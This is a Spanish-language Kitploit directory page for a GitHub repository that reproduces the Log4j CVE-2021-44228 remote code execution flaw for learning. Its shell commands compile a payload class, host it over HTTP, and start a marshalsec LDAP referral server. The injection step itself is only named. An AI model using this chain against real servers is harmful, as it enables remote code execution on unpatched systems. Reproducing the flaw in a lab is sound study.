Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Log4j-Rec-CVE-2021-44228 — Reproducción de la vulnerabilidad Apache Log4j CVE-2021-44228 | Kitploit
Herramientas/GitHubGitHub/zhangxvx/log4j-rec-cve-2021-44228
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónLabs y Práctica
GitHubzhangxvx/log4j-rec-cve-2021-44228

Log4j-Rec-CVE-2021-44228

Reproducción de la vulnerabilidad Apache Log4j CVE-2021-44228

Ver Repositorio
hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Notas de reproducción de Log4j2, solo para aprendizaje

Referencia: https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce

Crear el archivo ejecutable

root@kitploit:~
com/example/template

javac Log4jRCE.java

Iniciar el servidor HTTP integrado de Python

root@kitploit:~
com/example/template
python -m http.server 8888

Iniciar el servidor LDAP

root@kitploit:~
tools
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Log4jRCE"

Simular el envío del formulario de ataque de inyección

root@kitploit:~
com/example/hack/Hack.java
Descargar herramienta